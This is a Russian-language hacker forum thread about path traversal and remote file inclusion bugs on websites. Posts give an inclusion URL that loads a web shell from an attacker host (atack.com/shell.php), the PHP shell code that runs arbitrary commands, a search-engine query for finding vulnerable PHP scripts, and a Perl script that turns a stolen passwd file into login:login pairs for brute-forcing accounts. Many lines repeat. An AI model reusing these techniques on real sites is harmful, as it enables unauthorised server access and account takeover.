Тогда ты явно сайтом ошибсяМда...я тут ничерта не понял..
-
XSS.stack #1 – первый литературный журнал от юзеров форума
О баге /../../../../
- Автор темы eRweB
- Дата начала
- Статус
dampil
Такой баги нет в IPB. Иначе всебы так хачили. КонфГлобал этот фаил зовется, но там защита от просмотра.
Такой баги нет в IPB. Иначе всебы так хачили. КонфГлобал этот фаил зовется, но там защита от просмотра.
А обойти ее можно только изменив права на файл (то есть заиметь доступ к фтп)...
N1TR0X
Нифига. Там просто конфиги эти в скрипте хранятся, а когда файл запускаешь - он выполняет функцию, прописанную в нем. Это так скрипт сделан.
Нифига. Там просто конфиги эти в скрипте хранятся, а когда файл запускаешь - он выполняет функцию, прописанную в нем. Это так скрипт сделан.
©yBe®0Ge№
а ты наверное вводишь в поисковике ../../../ ?
надо вводить имя скрипта, ну допустим textversion.pl и читать багтраг http://www.security.nnov.ru/Idocument536.html
а ты наверное вводишь в поисковике ../../../ ?
надо вводить имя скрипта, ну допустим textversion.pl и читать багтраг http://www.security.nnov.ru/Idocument536.html
Это баг который возникает потому что переменная не фильтруется т.е. вы можете выполнить или просмотреть любой файл на сервере и не только, если вам позволяют права... Так же можно выполнить посторонний файл т.е.
www.site.com/script.php?file=http://atack.com/shell.php
Где shell.php, это скрипт вида:
<?
system(`[command]`);
?>
www.site.com/script.php?file=http://atack.com/shell.php
Где shell.php, это скрипт вида:
<?
system(`[command]`);
?>
durito Я ничего не ввожу, потому что незнаю что вводить...
Из того что написал BUG(O)R, я понял что нет конкретно такого запроса, по которому в поисковике можно найти бажный сайт.
Из того что написал BUG(O)R, я понял что нет конкретно такого запроса, по которому в поисковике можно найти бажный сайт.
durito
на security.nnov.ru публикуются уязвимости не в скриптах, а в ПО и софте!
И вообще если вы уж хакеры, то учитесь искать сами эти баги!
на security.nnov.ru публикуются уязвимости не в скриптах, а в ПО и софте!
И вообще если вы уж хакеры, то учитесь искать сами эти баги!
©yBe®0Ge№
Почитай статью форба http://www.xakep.ru//magazine/xs/047/042/1.asp
Почитай статью форба http://www.xakep.ru//magazine/xs/047/042/1.asp
google.com
filetype:php inurl:[file,path,fopen]
filetype:php inurl:[file,path,fopen]
BUG(O)R
ты по ссылке то зайди прежде чем говорить
http://www.security.nnov.ru/Idocument536.html
это первое
второе, баг описанный тобой называется инклюдой, и к атаке типа ../../ не имеет отношения
ты по ссылке то зайди прежде чем говорить
http://www.security.nnov.ru/Idocument536.html
это первое
второе, баг описанный тобой называется инклюдой, и к атаке типа ../../ не имеет отношения
durito
Ты мозгами пошевели, если я имею право открыть любой файл на серваке, почему я не могу открыть любой файл вне сервака? Он может неисполниться, это да, но открыться он откроется!
Ты мозгами пошевели, если я имею право открыть любой файл на серваке, почему я не могу открыть любой файл вне сервака? Он может неисполниться, это да, но открыться он откроется!
а чем расшефровать полученый файлик чтоб патом брутануть (брутить) :crazy:
слышал какимта parser'ом написаным на perl'e искал в поисковиках ничего путёвого не нашёл!!или он приватный??
слышал какимта parser'ом написаным на perl'e искал в поисковиках ничего путёвого не нашёл!!или он приватный??
а всё разобрался вот он:
всётаки харошая штука поисковик!!
Код:
#!/usr/bin/perl
$in=$ARGV[0];
$out=$ARGV[1]; ## определим параметры скрипта
exit print "Use $0 $in $out\n" unless ($out);
open(IN, "$in");
open(OUT, ">out");
while(<IN>){
chomp;
if (~/sh$/){ ## запишем только валидные аккаунты
($u,@udef)=split ":";
print OUT "$u:$u\n"; ## В виде пары login:login
}
}
close(IN);
close(OUT);всётаки харошая штука поисковик!!
- Статус